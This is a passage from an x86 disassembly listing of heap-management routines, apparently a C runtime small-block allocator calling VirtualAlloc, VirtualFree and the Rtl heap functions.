mov ecx, [ebp+var_8]
lea edx, [ecx+eax*8]
mov [ebp+var_20], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov [eax+8], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
mov eax, [ebp+var_1C]
mov [edx+8], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_1C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_4245FA
cmp [ebp+var_28], 20h
jnb short loc_424593
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_424571
mov edx, 80000000h
mov ecx, [ebp+var_28]
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_424571: ; CODE XREF: sub_4241B0+3A9�j
mov eax, 80000000h
mov ecx, [ebp+var_28]
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+44h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+44h], ecx
jmp short loc_4245FA
; ---------------------------------------------------------------------------
loc_424593: ; CODE XREF: sub_4241B0+386�j
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_4245D1
mov ecx, [ebp+var_28]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_4245D1: ; CODE XREF: sub_4241B0+404�j
mov ecx, [ebp+var_28]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
loc_4245FA: ; CODE XREF: sub_4241B0+334�j
; sub_4241B0+37C�j ...
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_30]
mov [ecx], edx
mov eax, [ebp+var_1C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_30]
mov [eax-4], ecx
mov edx, [ebp+var_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jnz loc_424788
cmp ds:dword_4F3A00, 0
jz loc_424777
mov eax, ds:dword_4F39F4
shl eax, 0Fh
mov ecx, ds:dword_4F3A00
mov edx, [ecx+0Ch]
add edx, eax
mov [ebp+var_18], edx
push 4000h
push 8000h
mov eax, [ebp+var_18]
push eax
call ds:dword_4F54B0 ; VirtualFree
mov edx, 80000000h
mov ecx, ds:dword_4F39F4
shr edx, cl
mov eax, ds:dword_4F3A00
mov ecx, [eax+8]
or ecx, edx
mov edx, ds:dword_4F3A00
mov [edx+8], ecx
mov eax, ds:dword_4F3A00
mov ecx, [eax+10h]
mov edx, ds:dword_4F39F4
mov dword ptr [ecx+edx*4+0C4h], 0
mov eax, ds:dword_4F3A00
mov ecx, [eax+10h]
mov dl, [ecx+43h]
sub dl, 1
mov eax, ds:dword_4F3A00
mov ecx, [eax+10h]
mov [ecx+43h], dl
mov edx, ds:dword_4F3A00
mov eax, [edx+10h]
movsx ecx, byte ptr [eax+43h]
test ecx, ecx
jnz short loc_4246D5
mov edx, ds:dword_4F3A00
mov eax, [edx+4]
and al, 0FEh
mov ecx, ds:dword_4F3A00
mov [ecx+4], eax
loc_4246D5: ; CODE XREF: sub_4241B0+50F�j
mov edx, ds:dword_4F3A00
cmp dword ptr [edx+8], 0FFFFFFFFh
jnz loc_424777
push 8000h
push 0
mov eax, ds:dword_4F3A00
mov ecx, [eax+0Ch]
push ecx
call ds:dword_4F54B0 ; VirtualFree
mov edx, ds:dword_4F3A00
mov eax, [edx+10h]
push eax
push 0
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F5414 ; RtlFreeHeap
mov edx, ds:dword_4F3A04
imul edx, 14h
mov eax, ds:dword_4F3A08
add eax, edx
mov ecx, ds:dword_4F3A00
add ecx, 14h
sub eax, ecx
push eax
mov edx, ds:dword_4F3A00
add edx, 14h
push edx
mov eax, ds:dword_4F3A00
push eax
call sub_420840
add esp, 0Ch
mov ecx, ds:dword_4F3A04
sub ecx, 1
mov ds:dword_4F3A04, ecx
mov edx, [ebp+arg_0]
cmp edx, ds:dword_4F3A00
jbe short loc_42476B
mov eax, [ebp+arg_0]
sub eax, 14h
mov [ebp+arg_0], eax
loc_42476B: ; CODE XREF: sub_4241B0+5B0�j
mov ecx, ds:dword_4F3A08
mov ds:dword_4F39F8, ecx
loc_424777: ; CODE XREF: sub_4241B0+47E�j
; sub_4241B0+52F�j
mov edx, [ebp+arg_0]
mov ds:dword_4F3A00, edx
mov eax, [ebp+var_4]
mov ds:dword_4F39F4, eax
loc_424788: ; CODE XREF: sub_4241B0+58�j
; sub_4241B0+471�j
mov esp, ebp
pop ebp
retn
sub_4241B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424790 proc near ; CODE XREF: sub_4234C0+4C�p
; sub_423830+D4�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push esi
mov eax, ds:dword_4F3A04
imul eax, 14h
mov ecx, ds:dword_4F3A08
add ecx, eax
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_0]
add edx, 17h
and edx, 0FFFFFFF0h
mov [ebp+var_28], edx
mov eax, [ebp+var_28]
sar eax, 4
sub eax, 1
mov [ebp+var_20], eax
cmp [ebp+var_20], 20h
jge short loc_4247DC
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_20]
shr edx, cl
mov [ebp+var_24], edx
mov [ebp+var_34], 0FFFFFFFFh
jmp short loc_4247F1
; ---------------------------------------------------------------------------
loc_4247DC: ; CODE XREF: sub_424790+36�j
mov [ebp+var_24], 0
mov ecx, [ebp+var_20]
sub ecx, 20h
or eax, 0FFFFFFFFh
shr eax, cl
mov [ebp+var_34], eax
loc_4247F1: ; CODE XREF: sub_424790+4A�j
mov ecx, ds:dword_4F39F8
mov [ebp+var_18], ecx
loc_4247FA: ; CODE XREF: sub_424790+94�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnb short loc_424826
mov eax, [ebp+var_18]
mov ecx, [ebp+var_24]
and ecx, [eax]
mov edx, [ebp+var_18]
mov eax, [ebp+var_34]
and eax, [edx+4]
or ecx, eax
test ecx, ecx
jz short loc_42481B
jmp short loc_424826
; ---------------------------------------------------------------------------
loc_42481B: ; CODE XREF: sub_424790+87�j
mov ecx, [ebp+var_18]
add ecx, 14h
mov [ebp+var_18], ecx
jmp short loc_4247FA
; ---------------------------------------------------------------------------
loc_424826: ; CODE XREF: sub_424790+70�j
; sub_424790+89�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnz loc_42490D
mov eax, ds:dword_4F3A08
mov [ebp+var_18], eax
loc_42483A: ; CODE XREF: sub_424790+D7�j
mov ecx, [ebp+var_18]
cmp ecx, ds:dword_4F39F8
jnb short loc_424869
mov edx, [ebp+var_18]
mov eax, [ebp+var_24]
and eax, [edx]
mov ecx, [ebp+var_18]
mov edx, [ebp+var_34]
and edx, [ecx+4]
or eax, edx
test eax, eax
jz short loc_42485E
jmp short loc_424869
; ---------------------------------------------------------------------------
loc_42485E: ; CODE XREF: sub_424790+CA�j
mov eax, [ebp+var_18]
add eax, 14h
mov [ebp+var_18], eax
jmp short loc_42483A
; ---------------------------------------------------------------------------
loc_424869: ; CODE XREF: sub_424790+B3�j
; sub_424790+CC�j
mov ecx, [ebp+var_18]
cmp ecx, ds:dword_4F39F8
jnz loc_42490D
loc_424878: ; CODE XREF: sub_424790+104�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnb short loc_424896
mov eax, [ebp+var_18]
cmp dword ptr [eax+8], 0
jz short loc_42488B
jmp short loc_424896
; ---------------------------------------------------------------------------
loc_42488B: ; CODE XREF: sub_424790+F7�j
mov ecx, [ebp+var_18]
add ecx, 14h
mov [ebp+var_18], ecx
jmp short loc_424878
; ---------------------------------------------------------------------------
loc_424896: ; CODE XREF: sub_424790+EE�j
; sub_424790+F9�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnz short loc_4248E7
mov eax, ds:dword_4F3A08
mov [ebp+var_18], eax
loc_4248A6: ; CODE XREF: sub_424790+135�j
mov ecx, [ebp+var_18]
cmp ecx, ds:dword_4F39F8
jnb short loc_4248C7
mov edx, [ebp+var_18]
cmp dword ptr [edx+8], 0
jz short loc_4248BC
jmp short loc_4248C7
; ---------------------------------------------------------------------------
loc_4248BC: ; CODE XREF: sub_424790+128�j
mov eax, [ebp+var_18]
add eax, 14h
mov [ebp+var_18], eax
jmp short loc_4248A6
; ---------------------------------------------------------------------------
loc_4248C7: ; CODE XREF: sub_424790+11F�j
; sub_424790+12A�j
mov ecx, [ebp+var_18]
cmp ecx, ds:dword_4F39F8
jnz short loc_4248E7
call sub_424CD0
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_4248E7
xor eax, eax
jmp loc_424CC1
; ---------------------------------------------------------------------------
loc_4248E7: ; CODE XREF: sub_424790+10C�j
; sub_424790+140�j ...
mov edx, [ebp+var_18]
push edx
call sub_424DE0
add esp, 4
mov ecx, [ebp+var_18]
mov edx, [ecx+10h]
mov [edx], eax
mov eax, [ebp+var_18]
mov ecx, [eax+10h]
cmp dword ptr [ecx], 0FFFFFFFFh
jnz short loc_42490D
xor eax, eax
jmp loc_424CC1
; ---------------------------------------------------------------------------
loc_42490D: ; CODE XREF: sub_424790+9C�j
; sub_424790+E2�j ...
mov edx, [ebp+var_18]
mov ds:dword_4F39F8, edx
mov eax, [ebp+var_18]
mov ecx, [eax+10h]
mov [ebp+var_38], ecx
mov edx, [ebp+var_38]
mov eax, [edx]
mov [ebp+var_30], eax
cmp [ebp+var_30], 0FFFFFFFFh
jz short loc_424950
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov eax, [ebp+var_24]
and eax, [edx+ecx*4+44h]
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov esi, [ebp+var_34]
and esi, [edx+ecx*4+0C4h]
or eax, esi
test eax, eax
jnz short loc_424985
loc_424950: ; CODE XREF: sub_424790+19B�j
mov [ebp+var_30], 0
loc_424957: ; CODE XREF: sub_424790+1F3�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov edx, [ebp+var_24]
and edx, [ecx+eax*4+44h]
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov esi, [ebp+var_34]
and esi, [ecx+eax*4+0C4h]
or edx, esi
test edx, edx
jnz short loc_424985
mov edx, [ebp+var_30]
add edx, 1
mov [ebp+var_30], edx
jmp short loc_424957
; ---------------------------------------------------------------------------
loc_424985: ; CODE XREF: sub_424790+1BE�j
; sub_424790+1E8�j
mov eax, [ebp+var_30]
imul eax, 204h
mov ecx, [ebp+var_38]
lea edx, [ecx+eax+144h]
mov [ebp+var_4], edx
mov [ebp+var_20], 0
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov edx, [ebp+var_24]
and edx, [ecx+eax*4+44h]
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jnz short loc_4249D2
mov [ebp+var_20], 20h
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov edx, [ebp+var_34]
and edx, [ecx+eax*4+0C4h]
mov [ebp+var_1C], edx
loc_4249D2: ; CODE XREF: sub_424790+226�j
; sub_424790+259�j
cmp [ebp+var_1C], 0
jl short loc_4249EB
mov eax, [ebp+var_1C]
shl eax, 1
mov [ebp+var_1C], eax
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
jmp short loc_4249D2
; ---------------------------------------------------------------------------
loc_4249EB: ; CODE XREF: sub_424790+246�j
mov edx, [ebp+var_20]
mov eax, [ebp+var_4]
mov ecx, [eax+edx*8+4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
mov eax, [edx]
sub eax, [ebp+var_28]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
sar ecx, 4
sub ecx, 1
mov [ebp+var_14], ecx
cmp [ebp+var_14], 3Fh
jle short loc_424A1C
mov [ebp+var_14], 3Fh
loc_424A1C: ; CODE XREF: sub_424790+283�j
mov edx, [ebp+var_14]
cmp edx, [ebp+var_20]
jz loc_424C40
mov eax, [ebp+var_10]
mov ecx, [ebp+var_10]
mov edx, [eax+4]
cmp edx, [ecx+8]
jnz loc_424B0A
cmp [ebp+var_20], 20h
jge short loc_424A9F
mov eax, 80000000h
mov ecx, [ebp+var_20]
shr eax, cl
not eax
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov ecx, [edx+ecx*4+44h]
and ecx, eax
mov edx, [ebp+var_30]
mov eax, [ebp+var_38]
mov [eax+edx*4+44h], ecx
mov ecx, [ebp+var_38]
add ecx, [ebp+var_20]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_38]
add eax, [ebp+var_20]
mov [eax+4], dl
mov ecx, [ebp+var_38]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_424A9D
mov eax, 80000000h
mov ecx, [ebp+var_20]
shr eax, cl
not eax
mov ecx, [ebp+var_18]
mov edx, [ecx]
and edx, eax
mov eax, [ebp+var_18]
mov [eax], edx
loc_424A9D: ; CODE XREF: sub_424790+2F3�j
jmp short loc_424B0A
; ---------------------------------------------------------------------------
loc_424A9F: ; CODE XREF: sub_424790+2AE�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
not edx
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov eax, [ecx+eax*4+0C4h]
and eax, edx
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov [edx+ecx*4+0C4h], eax
mov eax, [ebp+var_38]
add eax, [ebp+var_20]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_38]
add edx, [ebp+var_20]
mov [edx+4], cl
mov eax, [ebp+var_38]
add eax, [ebp+var_20]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_424B0A
mov ecx, [ebp+var_20]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
not edx
mov eax, [ebp+var_18]
mov ecx, [eax+4]
and ecx, edx
mov edx, [ebp+var_18]
mov [edx+4], ecx
loc_424B0A: ; CODE XREF: sub_424790+2A4�j
; sub_424790:loc_424A9D�j ...
mov eax, [ebp+var_10]
mov ecx, [eax+8]
mov edx, [ebp+var_10]
mov eax, [edx+4]
mov [ecx+4], eax
mov ecx, [ebp+var_10]
mov edx, [ecx+4]
mov eax, [ebp+var_10]
mov ecx, [eax+8]
mov [edx+8], ecx
cmp [ebp+var_8], 0
jz loc_424C40
mov edx, [ebp+var_14]
mov eax, [ebp+var_4]
lea ecx, [eax+edx*8]
mov [ebp+var_C], ecx
mov edx, [ebp+var_10]
mov eax, [ebp+var_C]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_10]
mov eax, [ebp+var_C]
mov [edx+8], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+var_10]
mov [ecx+4], edx
mov eax, [ebp+var_10]
mov ecx, [eax+4]
mov edx, [ebp+var_10]
mov [ecx+8], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_10]
mov edx, [eax+4]
cmp edx, [ecx+8]
jnz loc_424C40
cmp [ebp+var_14], 20h
jge short loc_424BDA
mov eax, [ebp+var_38]
add eax, [ebp+var_14]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov [edx+4], al
test ecx, ecx
jnz short loc_424BB8
mov eax, 80000000h
mov ecx, [ebp+var_14]
shr eax, cl
mov ecx, [ebp+var_18]
mov edx, [ecx]
or edx, eax
mov eax, [ebp+var_18]
mov [eax], edx
loc_424BB8: ; CODE XREF: sub_424790+410�j
mov edx, 80000000h
mov ecx, [ebp+var_14]
shr edx, cl
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov eax, [ecx+eax*4+44h]
or eax, edx
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov [edx+ecx*4+44h], eax
jmp short loc_424C40
; ---------------------------------------------------------------------------
loc_424BDA: ; CODE XREF: sub_424790+3EE�j
mov eax, [ebp+var_38]
add eax, [ebp+var_14]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov [edx+4], al
test ecx, ecx
jnz short loc_424C17
mov ecx, [ebp+var_14]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_18]
mov edx, [ecx+4]
or edx, eax
mov eax, [ebp+var_18]
mov [eax+4], edx
loc_424C17: ; CODE XREF: sub_424790+46A�j
mov ecx, [ebp+var_14]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov eax, [ecx+eax*4+0C4h]
or eax, edx
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov [edx+ecx*4+0C4h], eax
loc_424C40: ; CODE XREF: sub_424790+292�j
; sub_424790+39C�j ...
cmp [ebp+var_8], 0
jz short loc_424C5A
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_8]
mov eax, [ebp+var_8]
mov [edx-4], eax
loc_424C5A: ; CODE XREF: sub_424790+4B4�j
mov ecx, [ebp+var_10]
add ecx, [ebp+var_8]
mov [ebp+var_10], ecx
mov edx, [ebp+var_28]
add edx, 1
mov eax, [ebp+var_10]
mov [eax], edx
mov ecx, [ebp+var_28]
add ecx, 1
mov edx, [ebp+var_10]
add edx, [ebp+var_28]
mov [edx-4], ecx
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov edx, [ebp+var_4]
mov [edx], eax
test ecx, ecx
jnz short loc_424CB3
mov eax, [ebp+var_18]
cmp eax, ds:dword_4F3A00
jnz short loc_424CB3
mov ecx, [ebp+var_30]
cmp ecx, ds:dword_4F39F4
jnz short loc_424CB3
mov ds:dword_4F3A00, 0
loc_424CB3: ; CODE XREF: sub_424790+501�j
; sub_424790+50C�j ...
mov edx, [ebp+var_38]
mov eax, [ebp+var_30]
mov [edx], eax
mov eax, [ebp+var_10]
add eax, 4
loc_424CC1: ; CODE XREF: sub_424790+152�j
; sub_424790+178�j
pop esi
mov esp, ebp
pop ebp
retn
sub_424790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424CD0 proc near ; CODE XREF: sub_424790+142�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F3A04
cmp eax, ds:dword_4F39F0
jnz short loc_424D2B
mov ecx, ds:dword_4F39F0
add ecx, 10h
imul ecx, 14h
push ecx
mov edx, ds:dword_4F3A08
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_424D13
xor eax, eax
jmp loc_424DDB
; ---------------------------------------------------------------------------
loc_424D13: ; CODE XREF: sub_424CD0+3A�j
mov ecx, [ebp+var_4]
mov ds:dword_4F3A08, ecx
mov edx, ds:dword_4F39F0
add edx, 10h
mov ds:dword_4F39F0, edx
loc_424D2B: ; CODE XREF: sub_424CD0+F�j
mov eax, ds:dword_4F3A04
imul eax, 14h
mov ecx, ds:dword_4F3A08
add ecx, eax
mov [ebp+var_4], ecx
push 41C4h
push 8
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5418 ; RtlAllocateHeap
mov ecx, [ebp+var_4]
mov [ecx+10h], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+10h], 0
jnz short loc_424D65
xor eax, eax
jmp short loc_424DDB
; ---------------------------------------------------------------------------
loc_424D65: ; CODE XREF: sub_424CD0+8F�j
push 4
push 2000h
push 100000h
push 0
call ds:dword_4F54B4 ; VirtualAlloc
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+0Ch], 0
jnz short loc_424DA2
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
push 0
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5414 ; RtlFreeHeap
xor eax, eax
jmp short loc_424DDB
; ---------------------------------------------------------------------------
loc_424DA2: ; CODE XREF: sub_424CD0+B6�j
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_4]
mov dword ptr [edx+8], 0FFFFFFFFh
mov eax, ds:dword_4F3A04
add eax, 1
mov ds:dword_4F3A04, eax
mov ecx, [ebp+var_4]
mov edx, [ecx+10h]
mov dword ptr [edx], 0FFFFFFFFh
mov eax, [ebp+var_4]
loc_424DDB: ; CODE XREF: sub_424CD0+3E�j
; sub_424CD0+93�j ...
mov esp, ebp
pop ebp
retn
sub_424CD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424DE0 proc near ; CODE XREF: sub_424790+15B�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ebp+var_8], eax
mov [ebp+var_28], 0
loc_424DFF: ; CODE XREF: sub_424DE0+36�j
cmp [ebp+var_8], 0
jl short loc_424E18
mov ecx, [ebp+var_8]
shl ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_28]
add edx, 1
mov [ebp+var_28], edx
jmp short loc_424DFF
; ---------------------------------------------------------------------------
loc_424E18: ; CODE XREF: sub_424DE0+23�j
mov eax, [ebp+var_28]
imul eax, 204h
mov ecx, [ebp+var_2C]
lea edx, [ecx+eax+144h]
mov [ebp+var_C], edx
mov [ebp+var_20], 0
jmp short loc_424E40
; ---------------------------------------------------------------------------
loc_424E37: ; CODE XREF: sub_424DE0+84�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
loc_424E40: ; CODE XREF: sub_424DE0+55�j
cmp [ebp+var_20], 3Fh
jge short loc_424E66
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
lea eax, [edx+ecx*8]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_18]
mov [ecx+8], edx
mov eax, [ebp+var_18]
mov ecx, [ebp+var_18]
mov [eax+4], ecx
jmp short loc_424E37
; ---------------------------------------------------------------------------
loc_424E66: ; CODE XREF: sub_424DE0+64�j
mov edx, [ebp+var_28]
shl edx, 0Fh
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
add ecx, edx
mov [ebp+var_10], ecx
push 4
push 1000h
push 8000h
mov edx, [ebp+var_10]
push edx
call ds:dword_4F54B4 ; VirtualAlloc
test eax, eax
jnz short loc_424E99
or eax, 0FFFFFFFFh
jmp loc_424FCA
; ---------------------------------------------------------------------------
loc_424E99: ; CODE XREF: sub_424DE0+AF�j
mov eax, [ebp+var_10]
add eax, 7000h
mov [ebp+var_1C], eax
mov ecx, [ebp+var_10]
mov [ebp+var_4], ecx
jmp short loc_424EB8
; ---------------------------------------------------------------------------
loc_424EAC: ; CODE XREF: sub_424DE0+13B�j
mov edx, [ebp+var_4]
add edx, 1000h
mov [ebp+var_4], edx
loc_424EB8: ; CODE XREF: sub_424DE0+CA�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
ja short loc_424F1D
mov ecx, [ebp+var_4]
mov dword ptr [ecx+8], 0FFFFFFFFh
mov edx, [ebp+var_4]
mov dword ptr [edx+0FFCh], 0FFFFFFFFh
mov eax, [ebp+var_4]
add eax, 0Ch
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov dword ptr [ecx], 0FF0h
mov edx, [ebp+var_18]
add edx, 1000h
mov eax, [ebp+var_18]
mov [eax+4], edx
mov ecx, [ebp+var_18]
sub ecx, 1000h
mov edx, [ebp+var_18]
mov [edx+8], ecx
mov eax, [ebp+var_18]
add eax, 0FECh
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov dword ptr [ecx], 0FF0h
jmp short loc_424EAC
; ---------------------------------------------------------------------------
loc_424F1D: ; CODE XREF: sub_424DE0+DE�j
mov edx, [ebp+var_C]
add edx, 1F8h
mov [ebp+var_14], edx
mov eax, [ebp+var_10]
add eax, 0Ch
mov ecx, [ebp+var_14]
mov [ecx+4], eax
mov edx, [ebp+var_14]
mov eax, [edx+4]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_14]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
add eax, 0Ch
mov ecx, [ebp+var_14]
mov [ecx+8], eax
mov edx, [ebp+var_14]
mov eax, [edx+8]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_14]
mov [ecx+4], edx
mov eax, [ebp+var_28]
mov ecx, [ebp+var_2C]
mov dword ptr [ecx+eax*4+44h], 0
mov edx, [ebp+var_28]
mov eax, [ebp+var_2C]
mov dword ptr [eax+edx*4+0C4h], 1
mov ecx, [ebp+var_2C]
movsx edx, byte ptr [ecx+43h]
mov eax, [ebp+var_2C]
mov cl, [eax+43h]
add cl, 1
mov eax, [ebp+var_2C]
mov [eax+43h], cl
test edx, edx
jnz short loc_424FAD
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
or edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_424FAD: ; CODE XREF: sub_424DE0+1BC�j
mov edx, 80000000h
mov ecx, [ebp+var_28]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+var_28]
loc_424FCA: ; CODE XREF: sub_424DE0+B4�j
mov esp, ebp
pop ebp
retn
sub_424DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424FD0 proc near ; CODE XREF: sub_423620+81�p
; sub_423830+BC�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_8]
add eax, 17h
and al, 0F0h
mov [ebp+var_1C], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+10h]
mov [ebp+var_30], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
sub ecx, [eax+0Ch]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
shr edx, 0Fh
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
imul eax, 204h
mov ecx, [ebp+var_30]
lea edx, [ecx+eax+144h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
mov edx, [ecx]
sub edx, 1
mov [ebp+var_28], edx
mov eax, [ebp+var_14]
add eax, [ebp+var_28]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_2C]
mov edx, [ecx]
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jle loc_4252F6
mov ecx, [ebp+var_10]
and ecx, 1
test ecx, ecx
jnz short loc_42505B
mov edx, [ebp+var_28]
add edx, [ebp+var_10]
cmp [ebp+var_1C], edx
jle short loc_425062
loc_42505B: ; CODE XREF: sub_424FD0+7E�j
